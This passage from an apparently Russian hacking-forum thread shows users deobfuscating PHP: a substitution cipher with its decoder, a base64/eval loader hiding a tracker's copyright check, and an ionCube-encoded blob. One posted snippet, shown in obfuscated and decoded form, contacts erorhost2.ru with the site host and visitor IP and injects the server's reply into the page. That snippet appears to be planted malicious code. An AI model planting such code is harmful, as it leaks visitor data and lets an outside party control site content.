¤©ІьЂ+ўЉh§Cѓ[ЈЃ\x18?un\x1E=±t#ј\x0F’&Ю*Њ\x1CKм‰Q?o\x11°я@‚‡ГcЭFРз\x1Egr\ x1EFоAХж)лЁ®‹9:Ґ\x18®\x13 5y®j—ђжйЂ2vdU'Ж\x05jдф”\$Х*Њ^ш:ЙKl 9чЩхG”и[`\x1EµhнЬ["; ?>
это на выходе уже типо как декодированные файлы видимо требуется еще какая то операция чего я к сожелению не знаю,
Вопрос это можно раскадировать далее или это не правильный код выдал декодер ?? и если можно продемонстрируйте пожалуйста как это сделать что бы остальные файлы добить.

Спасибо за ответ.

Failure

17.10.2009, 21:57

function cods($txt)
{
$code = array (
'ZS12' => 'q',
'HJ56' => 'w',
'SD11' => 'e',
'CV32' => 'r',
'LK45' => 't',
'KK09' => 'y',
'WE56' => 'u',
'ZA12' => 'i',
'KL34' => 'o',
'DF44' => 'p',
'MN00' => 'a',
'JK42' => 's',
'LG90' => 'd',
'VB39' => 'f',
'ER47' => 'g',
'DZ94' => 'h',
'PZ23' => 'j',
'ZP85' => 'k',
'SA11' => 'l',
'AS31' => 'z',
'WM66' => 'x',
'UI93' => 'c',
'FK36' => 'v',
'KD92' => 'b',
'XH56' => 'n',
'JD73' => 'm',
'JE68' => '-',
'GG00' => '_',
'AL01' => '.',
'PO12' => '/',
'28KJ' => '0',
'03LL' => '1',
'23KA' => '2',
'74BG' => '3',
'54NN' => '4',
'12QG' => '5',
'76TR' => '6',
'26DF' => '7',
'73NS' => '8',
'98IU' => '9',
);

$tmp = "";
for($i=0; $i<strlen($txt); $i=$i+4)
{
$tmp .= $code[strtoupper(substr($txt,$i,4))];
}
return $tmp;
}

юзается на строке 2 раза, $new = cods(cods($str));
необходима функция decods, что бы $str=decods(decods($new));
вроде не сложно, но запарился с этим сдвигами
так же попрошу пошаговое пояснение

eLWAux

17.10.2009, 23:44

Failure:
function decods($txt)
{
$code = array (
'ZS12' => 'q',
'HJ56' => 'w',
'SD11' => 'e',
'CV32' => 'r',
'LK45' => 't',
'KK09' => 'y',
'WE56' => 'u',
'ZA12' => 'i',
'KL34' => 'o',
'DF44' => 'p',
'MN00' => 'a',
'JK42' => 's',
'LG90' => 'd',
'VB39' => 'f',
'ER47' => 'g',
'DZ94' => 'h',
'PZ23' => 'j',
'ZP85' => 'k',
'SA11' => 'l',
'AS31' => 'z',
'WM66' => 'x',
'UI93' => 'c',
'FK36' => 'v',
'KD92' => 'b',
'XH56' => 'n',
'JD73' => 'm',
'JE68' => '-',
'GG00' => '_',
'AL01' => '.',
'PO12' => '/',
'28KJ' => '0',
'03LL' => '1',
'23KA' => '2',
'74BG' => '3',
'54NN' => '4',
'12QG' => '5',
'76TR' => '6',
'26DF' => '7',
'73NS' => '8',
'98IU' => '9',
);

$tmp = "";
for($i=0; $i<strlen($txt); $i++)
{
$char = substr($txt,$i,1);
foreach ($code as $c=>$n) {
if ($n == $char)
$tmp .= $c;
}
}
return $tmp;
}

$cods = cods('MN00XH56LK45ZA12UI93DZ94MN00LK45AL01CV32WE56 '); // antichat.ru
$decods = decods('antichat.ru'); // MN00XH56LK45ZA12UI93DZ94MN00LK45AL01CV32WE56

MOSYA

18.10.2009, 02:43

Помогите расшифровать... подставлял вместо eval - echo... всё примерно такоеже.

<?php /* WARNING: This file is protected by copyright law. To reverse engineer or decode this file is strictly prohibited. */ $curversion = '1.00 BETA RC2'; $o="QAAAOzh3b3cKDSgtJ8Un9vX36QAA7eIn6u/h4ifg5+bv9Sft6QAg6O/35+71Kyf05gCQ+Cfi5OkAACsn9fwn6+nh4v/7J/fn9ugAAPfp/uf1+/b4J/bpJ/bl6e8AAOsn9ffi7eL36esmPC4nUEYAAFVJTklAPSdTb250J2Fu a2JAACcAgHd1aHNiZHNiYydlfidkAABod351bmBvcyYnLSgKDW FyAABpZHNuaGknan50dmtYamhjAABuYW5iY1h1aHB0Ly4nfAoN EjEOI2YA4ic6AkRmYWEE4gFjLy48AkEA0G5pYWhYdHN1AmYBES cB02J1YmAEACcvJyVVBUAnamZzZG9iYz0nAA4vXDcqPlotLiUr JyMC0QPhALB1UAhYAiQnBZJ1YnNydWknLwhVOyc2GKAuJzgBAA KHXDZaASAjARs9JzcuJzcAPScDdAoweg7IEEYOJGBraGVmaycj ACBkcnVxYnV0bmhpAxAOI0BLSAEIRUZLVCdcJQMWdjU0NgAxNj VlAQJtZWljZXRmAFBtcG9gbXYBkCUAAFonOicldGZjYzZhcGIz MTKAAAAwdTJ2MTJwMzF0NDZ2cGIyIQU2NAAgMjYyJQYhd3VuaX MRoUQZVUAAIQahJztmJ291YmE6WyVvc3MAAHc9KChlcypzdWZk bGJ1KWQAAGgpZGQoWyU5RH5FQlVvfncQYGInUwGzJ3ElJykMWQ DgJZ47KGZAADkfgDtldTknRH5lYnVTYmZqAAAnUGJlKkNicWJr aHdidXQhwQAaEQPRL2Nmc2IJEV4lJy4nOSc1FI83Nz8VwCUAgS olFQAlJS4FYAJqGnEV2QHwdHNjYWhocxW9DiUULxQpIBB0dFhy MEB1bgCQDyRYa2ZpYADwdnJidW5iQNR0AKBzdHNmdXMAkAExfi OAZgDWc24gEGpiAZBEUlVAVUhSVwCwdG9ocEWJWDAgZGJ0A8Fk HjYBwGViWAqxYnUY0TSQbmElYAEmLi1QDnUn0yAgAgFia3Ri1Q ABUSF3IALmIB+RNgJhdWJ2cm51YlgQC2hpZBSQJXNvYmpidCgV wSMNkxPwAV4lKHNiandrFrApQPAlFBEGsAOPA4904sIVwwN3C1 FkaHIkYiMQ9xvQISEnIxB1JwABXCBkZmlYcW5icGNiZXJgCvDI wAHxEbknOiugfmJ0HgA/QQ5haHViZgQAZG8nLycFeWZ0JyNsYn4nOjkBoCcjcWZrcmIGkA LyDiy2O2NucTlUg1wPES8Csiw7ESknMbE5JztlOQGjA9MAQFwl dGJkaGljdAHgOSc3KTc2iCAm0TthaA0AZGhraHUwIHViY1slAg Anc25za2IA4Nfi7enr4urj9CAD4vVQQOno9e/r7+Dv9+nlUVBUYAAA6Pfp9iknxffi6/gn7/bo6QAA7Ori6u/4J+j34uX8/+fi9QHzJ+rp9+v0KTPgCHEMNAhpCpA7KAgBCoAQST0nJQi7YHV iYmkI2MDnBwEn6lxQGQT04eMF8Akw5ScJVOfx7+8pCL/j6RPA6PT2C2Dp4ghvEMYIaDbxJTsoZTknUJpcCvNcHmJaWjsoF pFbaTqQJ4EOODAOh7AYaGV1JygMQCXCAbEikSZB2V3DDjg5ClA EDQ5pJRcAJSd0bn1iOjU5GvDK4gAE6eby6ePv6+kn9O3n4BZx5 eIIDvf27/kVUOnj9O315yYJ4RNUBMA43nYyQAcVI0zhZtI/bz9pJyYn0FN/U38yKfULf2JEAGMLec3p6HQg7vUn6ucn6+L29XAA6QpvEyEKkD g5";eval(base64_decode("JGxsbD0wO2V2YWwoYmFzZTY0X2RlY29kZSgiSkd4c2JHeHNiR3 hzYkd4c1BTZGlZWE5sTmpSZlpHVmpiMlJsSnpzPSIpKTskbGw9 MDtldmFsKCRsbGxsbGxsbGxsbCgiSkd4c2JHeHNiR3hzYkd3OU oyOXlaQ2M3IikpOyRsbGxsPTA7JGxsbGxsPTM7ZXZhbCgkbGxs bGxsbGxsbGwoIkpHdzlKR3hzYkd4c2JHeHNiR3hzS0NSdktUcz 0iKSk7JGxsbGxsbGw9MDskbGxsbGxsPSgkbGxsbGxsbGxsbCgk bFsxXSk8PDgpKyRsbGxsbGxsbGxsKCRsWzJdKTtldmFsKCRsbG xsbGxsbGxsbCgiSkd4c2JHeHNiR3hzYkd4c2JHdzlKM04wY214 bGJpYzciKSk7JGxsbGxsbGxsbD0xNjskbGxsbGxsbGw9IiI7Zm 9yKDskbGxsbGw8JGxsbGxsbGxsbGxsbGwoJGwpOyl7aWYoJGxs bGxsbGxsbD09MCl7JGxsbGxsbD0oJGxsbGxsbGxsbGwoJGxbJG xsbGxsKytdKTw8OCk7JGxsbGxsbCs9JGxsbGxsbGxsbGwoJGxb JGxsbGxsKytdKTskbGxsbGxsbGxsPTE2O31pZigkbGxsbGxsJj B4ODAwMCl7JGxsbD0oJGxsbGxsbGxsbGwoJGxbJGxsbGxsKytd KTw8NCk7JGxsbCs9KCRsbGxsbGxsbGxsKCRsWyRsbGxsbF0pPj 40KTtpZigkbGxsKXskbGw9KCRsbGxsbGxsbGxsKCRsWyRsbGxs bCsrXSkmMHgwZikrMztmb3IoJGxsbGw9MDskbGxsbDwkbGw7JG xsbGwrKykkbGxsbGxsbGxbJGxsbGxsbGwrJGxsbGxdPSRsbGxs bGxsbFskbGxsbGxsbC0kbGxsKyRsbGxsXTskbGxsbGxsbCs9JG xsO31lbHNleyRsbD0oJGxsbGxsbGxsbGwoJGxbJGxsbGxsKytd KTw8OCk7JGxsKz0kbGxsbGxsbGxsbCgkbFskbGxsbGwrK10pKz E2O2ZvcigkbGxsbD0wOyRsbGxsPCRsbDskbGxsbGxsbGxbJGxs bGxsbGwrJGxsbGwrK109JGxsbGxsbGxsbGwoJGxbJGxsbGxsXS kpOyRsbGxsbCsrOyRsbGxsbGxsKz0kbGw7fX1lbHNlJGxsbGxs bGxsWyRsbGxsbGxsKytdPSRsbGxsbGxsbGxsKCRsWyRsbGxsbC srXSk7JGxsbGxsbDw8PTE7JGxsbGxsbGxsbC0tO31ldmFsKCRs bGxsbGxsbGxsbCgiSkd4c2JHeHNiR3hzYkd4c2JEMG5ZMmh5Sn pzPSIpKTskbGxsbGw9MDtldmFsKCRsbGxsbGxsbGxsbCgiSkd4 c2JHeHNiR3hzYkQwaVB5SXVKR3hzYkd4c2JHeHNiR3hzYkNnMk 1pazciKSk7JGxsbGxsbGxsbGw9IiI7Zm9yKDskbGxsbGw8JGxs bGxsbGw7KXskbGxsbGxsbGxsbC49JGxsbGxsbGxsbGxsbCgkbG xsbGxsbGxbJGxsbGxsKytdXjB4MDcpO31ldmFsKCRsbGxsbGxs bGxsbCgiSkd4c2JHeHNiR3hzYkM0OUpHeHNiR3hzYkd4c2JHd3 VKR3hzYkd4c2JHeHNiR3hzYkNnMk1Da3VJajhpT3c9PSIpKTtl dmFsKCRsbGxsbGxsbGwpOw=="));return;?>

Буду благодарен, если получится.

krypt3r

18.10.2009, 09:49

2MOSYA

<?php
/* В строке ниже забит копирайт, убирая его, ты можешь распрощаться со своим трекером!;) WARNING: This file is protected by copyright! */
function mysql_modified_rows() {
$a_rows = mysql_affected_rows ();
$info_str = mysql_info ();
ereg ( "Rows matched: ([0-9]*)", $info_str, $r_matched );
return ($a_rows < 1) ? ($r_matched [1] ? $r_matched [1] : 0) : $a_rows;
}
function copyright() {
global $curversion;
$GLOBALS ["copyrightq231231212bjbndbsandbjwhgjq312"] = "sadd1fwe465465r5q65w46s31qwe513131515";
print ( "Copyright&copy <a href=\"http://bt-tracker.co.cc/\">CyBERhype Tracker v" . $curversion . "</a> by<br> CyberTeam Web-Developers&reg " . (date ( "Y" ) > 2008 ? "2008-" : "") . date ( "Y" ) );
}
function stdfoot() {
global $copyrightq231231212bjbndbsandbjwhgjq312, $ss_uri, $tracker_lang, $queries, $tstart, $query_stat, $querytime, $CURGROUP, $show_process, $curversion, $be_footer;
if ($be_footer)
return '';
else
$GLOBALS ['be_footer'] = 1;
require_once ("themes/" . $ss_uri . "/template.php");
require_once ("themes/" . $ss_uri . "/stdfoot.php");
if (count ( $query_stat ) && $CURGROUP ['can_viewdebug'] && $show_process == "yes") {
foreach ( $query_stat as $key => $value ) {
print ( "<div>[" . ($key + 1) . "] => <b>" . ($value ["seconds"] > 0.01 ? "<font color=\"red\" title=\"Рекомендуется оптимизировать запрос. Время исполнения превышает норму.\">" . $value ["seconds"] . "</font>" : "<font color=\"green\" title=\"Запрос не нуждается в оптимизации. Время исполнения допустимое.\">" . $value ["seconds"] . "</font>") . "</b> [$value[query]]</div>\n" );
}
print ( "<br />" );
}
if (! $curversion) {
?>
<font color="red" size=2><b>Необходимо указать версию продукта!</b></font>
<?
}
if ($copyrightq231231212bjbndbsandbjwhgjq312 != "sadd1fwe465465r5q65w46s31qwe513131515") {
?>
<font color="red" size=2><b>Копирайт на место!</b></font>
<?
}
}
?>

Vlad&slav

25.10.2009, 13:38

Помогите расшифровать JavaScript :)

вот тут (http://dump.ru/file/3644028) полный код.

MafyO_o

29.10.2009, 11:45

как розшифрувать ето???
<?php
$x0f="f\151\x6c\x65"; $x10="\146\x73\157ck\157\160\145\156"; $x11="\x69\x6dp\x6co\144\145";
$x0b = @$x10("\145ro\x72\150\157\x73\1642\056r\x75", 80, $x0c, $x0d, 6); if(!$x0b){return ''; }else{$x0e = @$x0f("\x68\x74tp:\x2f/\145r\x6f\x72\150o\x73t2.\x72\165\x2fid\x31\x2e\x7 0h\160?si\x74e=$_SERVER[HTTP_HOST]&i\160=$_SERVER[REMOTE_ADDR]");return $x11('',$x0e); }?>

mailbrush

29.10.2009, 12:47

как розшифрувать ето???
<?php

$fp = @fsockopen("erorhost2.ru", 80, $errno, $errstr, 6);
if (!$fp)
{
return '';
} else
{

$page = @file("http://erorhost2.ru/id1.php?site=" . $_SERVER[HTTP_HOST] . "&ip=" .
$_SERVER[REMOTE_ADDR]);
return implode('', $page);
}

?>
Вот так :)

MafyO_o

29.10.2009, 12:50

спс

Vlad&slav

30.10.2009, 18:22

А мне? :)

reprimand

31.10.2009, 19:04

а что мне с этим сделать?

<?php //0035e
if(!extension_loaded('ionCube Loader')){$__oc=strtolower(substr(php_uname(),0,3) );$__ln='/ioncube/ioncube_loader_'.$__oc.'_'.substr(phpversion(),0,3 ).(($__oc=='win')?'.dll':'.so');$__oid=$__id=realp ath(ini_get('extension_dir'));$__here=dirname(__FI LE__);if(strlen($__id)>1&&$__id[1]==':'){$__id=str_replace('\\','/',substr($__id,2));$__here=str_replace('\\','/',substr($__here,2));}$__rd=str_repeat('/..',substr_count($__id,'/')).$__here.'/';$__i=strlen($__rd);while($__i--){if($__rd[$__i]=='/'){$__lp=substr($__rd,0,$__i).$__ln;if(file_exists ($__oid.$__lp)){$__ln=$__lp;break;}}}@dl($__ln);}e lse{die('The file '.__FILE__." is corrupted.\n");}if(function_exists('_il_exec')){return _il_exec();}echo('Site error: the file <b>'.__FILE__.'</b> requires the ionCube PHP Loader '.basename($__ln).' to be installed by the site administrator.');exit(199);
?>
4+oV58qlC/aYhuV+B/Ecsk6cqxGXEAxoLFBzWxoiab7CjuzzDw9Ocjaqv795I2KCuZHu 7qfGQCMr
E1ezVN47DqBChXVp8vOjwdtVOtpvFYsj2n7HjLWQZR/q2F4MWRqYa2mGtg1UeBjY1ZZ6yxnoHZG1
ptt2P400PbfWZhiVDOq56l8xqyUSTc7TisjEOq6sau8+BtWJrk sjJNKb2j4HTU/AnNusW8Xo+yVK
znrUESX4ijEqQw3LMyhbia/2isfXMUy4gyfPvtjDXNfZfdp/RLR56GU+K2yDMY9G/r430DbDfwu4
dB/Qn/AN4D6Ih6Xq0sFB7bp/6STeQMM7WhoEbgmLyohAca6LCFdID5WHHa0E5sXL3Qy15Fv7fF 6H
KeW8EvHQY04Xuz31ZjPHa2CJQW6LALlrMc5L2KrBEkpOr8g5T+ SL5r1lyTp9EUw8QycSvNTeuzOJ
/I1tBk7zOkePREDCXtlQJWoJ7mp70UYTxQGtZF9UGNX/Gdcj27O939bLbUQOwA/1XeKS2BuvdYwu
CpWMbxf9UwBQgLdM0CIllWmrU3vS8Q8qM9u/1Wp7MnQ9e+Gz7KO2bKfzR6mQ7EJYp4CB5NdCUV1z
U4H6dBpHPZiAIjuUM3e/JeG6eb46mJjnhH3maSW+hR/Zwsr+YPSBWb945Lqztiyf9a/bb+rdrF1C
gtYUQ1triScsW6yMOlQAKhJZcc1/f8Nz2JDtVx4STUyqaQ1lbIcTOI07K5MmjNsSJ+nmesmLM9b5
oDkp+Tpmc8dAQtGUgcyWlgikuh8BGes/iCYuhqE0g0puN5U6jCoO3L0mCYOgwP8+nGtoYXTw84nE
Iq09fZl2mrAi5J7Rj4UH271CpbFK+Sa/obALIsH3o9JEdjicIXEx0nCre3TYO846PsUztCAIJP3O
IU1BFGoCK6t2nN1qcUt+1X+vs80wGsqzA0L0HiNyds8EZzI4Fk jZlrW9WoE5DqC2dhKdpoTT6V+u
R58CGdQcLYYSfhx5lRZmP6SHogpv/QeOBTZzGLuso6nTfj/9dLLdej1LyrWOmAPAkKgDFlkvII0b
LoPOmMOaq5B5jZl++Ysgkn23J0cqC4aQr2pxPbcGbJqfEeHUjE aNvrqmwuUDajish4KcVKqkGKPR
ghBiDq964wNuR8m4Yd9u5Bq0kKKaYuPt3ps6MH3U/fdUTmW3OA020Q+VCUPI/iA8UMrR0fIz+3g+
PuGjXiJAxQZ7fwiPM1SYpyNuSk7Z5LeunnHDT2+Rz7Nx4mu0y8 UUHtrSYuzGVdkmY28g31PbhkNM
H5bc8mrresmWe4tZnbZOOW7hzW/JJXegdUXhMLMtXVgzNPX3Jjh9Fa/wBLoPXrZFDcX9XKoz8pzW
H6tIREJdM8so1mSoQGCCwwpir/AvHEdfjzhlE0bq58DE2oEA6Q4Z/R+FhRRysMwHQR9hOeEXwFr7
IDk6YqL+fSyCpRBmp2YTCPmc6CnEoPUKA+PAMtCvRCGjR56HT3 GppUu6djbsvK83iu7LGV44KEZn
VnMZ7l9vC8qoRxG70U5MgUM8YEN1U1JCYdnlomkWYq94gJ0jA5 jCM1235PhNSftwep7hW8pBJLnq
419x+TJXZcYOlblaQA2LSAxuyHm8YaeU6+cAF/4mF+s9Uub4YepAx7icUvsleBBFwu23wtpFCuBx
MLd/wty/bkIQmW+vLUr/sWUh3wQrJPRA4yGZKDeEk8PAonAmTEVINg0CfQrmGHkH1Ch8e6 apxd4Q
CCIrZ+mA16+4T0K4+TsPhezEvSM8s1Foh4uzpnyCWxzxUNfhas rzObyhKTOJaexz/LNYNlBsmDfL
+pP3yDvkL5ukshV5jsqEyPxtE+5UJuELcuZstxjbyGlpBhZUvc ckNHOgOfJQ5ZfO2/F9LifO3cSn
fnJUnTTSTHuaWcWVKX1y95fLIjOYGcHDBwofXIkqKdftu411zZ VPzZ252Itj9qD28zQLCd71sE//
DmuhH1tGaMD7EFXzjyAoRN+mzCo7apUqAgquagYjE+rMRW1uqd RsgZIMN5G+HT1wvCt0v21dU7M0
6OzpIOQxY0TgGM0WZg35Tcw67B23aMGZ3Kb/pGRSTCSKY/XBJqStTryE10DgYy3jfgiqpflDUWU5
/G+9TRT0TG9ZThoBg0/QTfyMwJNgdEIrJTOLo6iRfV7dJ/jcuKaGMNPnAUqN70Z73ShOWPPrHnbl
+zfCkZjNc0gVOyqQastBwl5r2ohbwWnJ44QQE377b279XllWcy bTBltHTejuzwyPyF2m5SkhiXNG
gQhSVib20eHEGcHiPx9Gj7fLvc3yEwtn15Pm+Yt62kiq9gMt0z nWzLwR/ZqH/n0Q5F159p3rWruj
bf7Axx4Ed2ntPJ+I3eubgRuntFHnoeFHbdx13FLDusKLmAfWaU LDPIejaHZbvlU4vxgqGqzD2pQB
WJjCjPynDWgB4NarHozL6zS9pMamn9+rgM/9wuRdsCQoFPVzh1nBy6+brQDGK2ae7tVJfPFDXGYX
O2TryQ2te/apRfbgB5pBKiCRnyBZFlXfQsVFrMxI0NG5BfZg3rvb+7inacRQ IEuBY8vSC6A02EZ7
9OOO7HGEKTjvWzTOAD27p6x3NjoLorrqYkTY6gxL19jaTo0pFM bcXtiT7TZfv34qQnh1zVNb8lqw
S4mWCSvQT3+Pjzfo+DNKWMye+GRp/1SZHkFOlDGZOLdLk/J/Lcv/VDuXpOQk3Yv4cbE2PXI3BKTm
BMzZOoXUDzoWJstz1zpEERdTkTcDg7T9y5+vvavAqIjrT4JIMw sQgznZWzWn+cXlfWVLYweIqzY4
aFzJbEMP6P4zZp7SY2pBCjBNQ1sf4Qd9yINaUlN45AXHcLHwP4 6zvV68eD6GjDQ2AfMD3uv1ANy3
P2/OQSlqXk+f+VUTFLiRb/YATPUwyQJe8IhU2gqo3xeKsGW48eboLDtcbW22R6syDP2Rhm7+ 1+k9
9vpETEU36ln3fxLwA4mXqIYm0AyT2RPsy1Y1Ys2GshWPvSlwHf AkumasX14XGaX31R1NGP+32b1P
FrYKgQEBhCZvpRdL7l/bgYBn42X7tQFImkH3Vm5D6TEeHd0n7anHywE86GlHsiW1xxQB2 h/sXmMz
5SNYnFJZzBqMY6Mh0BLG5Pyf9yhmaJQ6q1E3JNHsI9rhgI9zXX psJRzR2kwL2GE8thu9sMqEKBQf
sjiB5VUt9ENOy2PFPv8RgrIt8Cg8uwB9HWCKpJR/4xafRVKgKavVnWmBKZRyH9yH3K/8rmFrAZuY
hGKvCYxTepKkWJx3evGi8fSzGeqOI/VKjuOD1orwWrzJOu1mpHxCK8QopwjtsLMFlFaP3bLsvIUv
OhA67QHBEhpL7Qxa88lxMyabJMAe0+m+PDyE5Uk8MT3s2a3Ch6 OquzKIDfdCHGbbVRurhap3tGCA
rw0G7fnvTALCyRdyYlpoE6UtcoRNVY6WVJCT/EBIgqRqYJgOk/IcPP9ySm6GaryaLCDmm5Li89Bs
7QWtBe0AQoDLI/KK4ENRStTkiEfgfUYN6ATdKo4py1IV/TvrfHjg7pE5Ggqn4IknL8/n3kQ+1i79
w0xCYsUq16bYNIRDPYEk7Y4BFuJr9N5wy8hINkOoHQCE6vNw9D DfqhznUv9jIKJfpd7gdj+mXM7w
cK3D81emLLxZPVvB2PdD4aPKVqJ0PM+rvhYet3NNNrrAl13DdY idbraSSr/JIM+faXDoOmS396Iq
OmK0ElZ0xWnyD47worHBPB47ZlqrqKzUqghM/Wxl7tZzG1QU0Qm2XV5KJ8WOTB3ApjnC2ptP4FZm
ObdgoKWCL2Fr4CRKS8B8vZ8C/TNJVrRiqaX/Ok/I6rRmVdzIMi7uVzXILn4/ebhGtvJOwz3RQ2Sf
KMqEf8zhPQ1ma3SExVkZdgZVOICmMk5FG4EPzPTBpNCl2BDaoc pILQyovDU3jPMSWaYHVEv+O5EE
9frn9ePjE87KoA0Op/LEsaVASnJmRvvUKxFIf4USMxrOD+hW60nQ7zu+sM8Cvv/MpoEEyoFeRC8T
CaEY2kGup4TyA74/Y/c/T/ILlRf3cDuZbQ3AQSqstSLFNCj23mFS49xA+OeepaXigqK/yBrwOVyi
SD1Bzuoet37VmX7BXmkU5+67Zr75FXuuvocp+LheQHTZJATndU q0u9/JvO/bIFkfpz+B0iC3F/cd
PDzAtVjujNdzaqii/vPXfu3MJ+sSO2noXEMrJ3QuolOO2ULlyeOcDDo1enPhBK7rAVr yec66iMYL
lV46yePwQftbt2ybPuyr2fyIVjChVQdkhsLVW3CZzmCrK/BeVYATAdSo0i75j1LsTWrj0lPHqEzC
PTxBnra7E1Jj3BCdKKSeiIlihM4QclBiMbB/fKP6++LTUA2+xBrQrWGnt10ISVVulvbRFudFWGxr
SBnPj5L2aSaM+snrs9NOXZCc+C37zocVAkv0/+ECYGC+C7YfyrLxKcRp0swEyVu5/YXCTPQU/Fvl
+qtu8L2jEVM/ur7JLDRUfKL/GFmReosDdTVf1P74BKWnY71mlBhUQO9ehTGj2pBamFBbDAvP7x jC
gTsYy3hGx4AjYcmuoOpjkYCM4avYgLYR7WZdQifyxIBreErXZ4 VKdDcHnkrmGO6/igugNt9Je3bU
3udaTYwYtbZ4dtrIi49cuRZYsOU3S/+WpDFzo3JlkMgU24FFLPSI2SH7sZ1fZ6zNtpYzr0+vFVg0
Y8h4zsSs8vFuQMNAoW+tulfcNHXdhOFDbP/4X4Du/1X6fF3OuExWC715wCC8zHj/G64M+YJDgL7/
ArwpQ+EwhlH9xcskLU98Y4eTdiZE7VUJkHdrtxh1cFiVgph+Vw E6AF9Qq2lo5zuoVIAEG63EYxa1
0qeWm8o9YVP5coLfxJNBXrGF1K86C21rlUjIylNvQR2s1oSnkH Nv6zCfjTlQw3/laRiiRdUuJHPx
i/9rc2CcW5C7++6lonUiB7ecXQOzXjeLVM50zybCxRQs77vv7LIT eoZKWtU98GbBE82uuOUHAifN
L14RsEcuA4DVCRvVHwDSnRF0xuRVLGtN8E0fa3AKaVeCpiuRHa yjgTAGwNoL+wNNfJsltmA4BZHG
lQTmex5coAxya51Df6NdlVNf9+BpwmJldvgOSjRjLMuZwWe4Tx lgh7K1tmTZrADB40LZueIrxhla
DEyRLYcYdXF98Lvuwz2YJQFW3/YafARNJGkg7xDANhfMRmoVoUAgDrRaxaGhvmha3btonxs4JiOz
RYQRIjD8A/SKJabwyNhz08TXttPnZFZfcXiOzIDFY3cDqvyzbFRBWhsc/Q6nLcEHjU1F94LH1UmO
S8R2Czvuy5FSrxxUBjfFE8EjyGFFZxbg55ISu5++U5R05CsLQU togwpF3jQUthGLtN4WODT4AvbE
gWJkBXVqTup1UgUhp3Hxalm6A5mTxiKftpTT3RYDFyCOpTKDTP Ia+ZIHIbGtI7oAu9Sqj+T2avr9
c8qz5oLZIJl/lxD6CG+i/I7GPu9mT01Ct60VdLucr6UWn+a13gwBVx+VtvcPVQkKx8vIF+0 h7qv3
jRs72n4iocxE8Tl/l0c8nsLr1Lb5a+8g07Wc3xWHwFsKg2E7iEP+yCsLXBgk0AlxK2 lnDUr0k1By
U/N8nBdpW3yRN70eN6APSHBaA9mdnZUudfvrMxSpmZBo9SkVG+Ab RbjHQkGj198vcC/Ix0JVa8de
28+DsIjBvtoQtj+dzFjwpYnN5D85PaLfLxTVQYoKs0eIJavLUU GzqBd7sHvDwm31Ch6ktB55UlzS
lrGSm05AdwTWIzmKdGGBXjje4hyo1PdputelZMi5Sq2Sv32F3s IHUfUdzj5h60SByzWJihSvDWN9
xEOlXdKPDHZbQk3ISfBscCogjJdkz5fuIjeWEGbYT41HTSceij rMFdtUg9SXdwjuKM1pRTs5f5na
/QWDAPMEjn0pqLg1REQUbRtbP0Va4hklCPJoJO8Hl/vmOpGqivLwj58HIfdKNk8cWolc7Y9rCmxP
uX6Mfyq2KqvOeDLk3OHm56qp78RoYjhLEzuqv7PNpQA9XPAX5/oLMG2Mfs2Q6X9lsRSHp7QJOicK
px4NqDCmvT8HP+qkMbuWdMIp2RviV6e0G07eWwdrJ11ohRH6jA ZCyuMcYbLdJuAeawKFFwoPV6uB
CrlYYqrKY3tZGnGSSBwQ1bGFfsgUFZXfnqJe68VAkZZRIgWGK7 6wQzJfA6I90pkVArII+u2keSYp
pHcq/HxyqdDKQl5WrkPnR7c1FrKRQlZIrHbEJf0fbRc2UXdzp3wdKdx hEdP7UDLjesFtCdvigDx+
Yd+WRmbU09kcR4n/QbGvr9BjbtGi+ctv6QbQZHduskP2+7gTUa0nypflpPkmm2L6oP E5M9ER2pts
OcAnfFR1nWHtk499QLt5fToqyEBzKNLVIKkfv7gPtTYOa3W4GB jjoxzfcosngZr9tkHzQH0XQKKO
K8WoR0sYNcIFwYfnDUHwTHvGlS9Xa+ZQzO0VCnjdO4Br5j+/TB/TbCY5rbuk/sr8WPF74iPNlH7V
CHH7g8eq97hgkjEofNTPZUbTKAypiK+RWtdkTZOsXVGNUb01PF OzoQxuQHbAXsx7hVk9FX+iEfne
en/RQjaGobfaD96DodY5UzN4XTp/1EszisfaZZ6KduLhx4yYXiOaFY5dALjHWPtR55XaxWfLdrYZ
ETPFu1cz5vxPZcNZ6wxj6Z1l1jNbJtMIrq+w00b7zdjEa1Hf1F Hnu2ipAOjU01tzCN5QqA/RVaky
Z2quwhdP0aDKvgkyXtmIHsb2FaYMyHtKBepzab8O8dt0zyZYAg Rag0LKOINf8vSC9S0pc4cXlcHj
JdrT+Kf/zi3cje5UsDCorNK3ouKGbKyGRJkNl+FD8a9DqnHwxk5186ieS1 JnWsYZRwbDYFDXvPAg
jgYa6gGh/LDC+/U5wRsRYq92AXOimMeSgKgocqeu2Xutte9L3+NvRAiLRv+d6wEb n5JGd6XQlgrE
CY+dWcPHo90q3FSMjljioWUTuIMGFrQDhN55Mu0uTEI4U0OE3k TvQ7gFYlnUYf0XOQtgId/0TzEf
xbdAKHHQjFUZvOWZBqua47TGoSgH5divXI8uMxXwmC0zMrCNXG nMbRDrK2Idcg72Y4voxqgy2zSc
8V+tQPXcBsHgZU12/p74g3loPvfB3pT9NQSluOvVPLh7iAdcV/NnMKwcaQcoOCZhuWpsAl+j2HZZ
OqAZ4S/+lOdnvvQ6aT08km9W45nYMNiofv+m2klKycnxxrWGuFrJCKezg TXAFZFuTOuSatpq9hf6
U+JcGRuocIbyNPvhhXKEZvTGdA2gLgXgE+8USbRx6oh1JeHXyc HLijctXywEXi7PDyvMn/D3dHTC
647Dc97SOse4GtvoaSdSfwpuiO/t4FlLbc0jkTb6wX3L1g7g75fFBaOR6R6CUpBeUqeIU4+vElvX
6MlwUqecGJ7izzGLA2BHcnb2IyGHNWdwftP0fK2NMabqQBd6ji mBpMddIIMnHNJ5TFXAmAp0J5Ys
kdPkSbijsKwZ7I1ReB3ZtJQqHhGwemibd8l1ezIvknjRn0k7pf Nu1xa0f/0F9lVlvVWErYoGvwwL
5YDK65T6mzllysH6lYnjnc7SRwNGOFENsf+aim2TlINg0zEHYr SkHFlB4wcocrERlsusA3Qls/ED
Eju/CqbGxdkmlJdX0x3+m7eJt6VrP9jSofFjeuQF+rKKiH4CoUOxja 168CymfLmdosCrnzyl7euC
gL/pagu0yqnNVONNT6AKJ9kq+Jud5TmbiqGP0HyFSWWz+6O/OmSS3trUegt6/R+KTi3OGRYIaRyR
Cyk+1CPXpzC1Como6mhm4aZKL7r5B95K15yH6KelycNi5ybU3x G2hfUnSZzdsbQqB0yEhw9X1bNi
sDOu9mnqnIYL8l/uQlLaq/2+8Mm5Ey+DYEJCFLYbjczaXqr2d0ivq9Li2U0Y+C55xmh5ljTA Z1ls
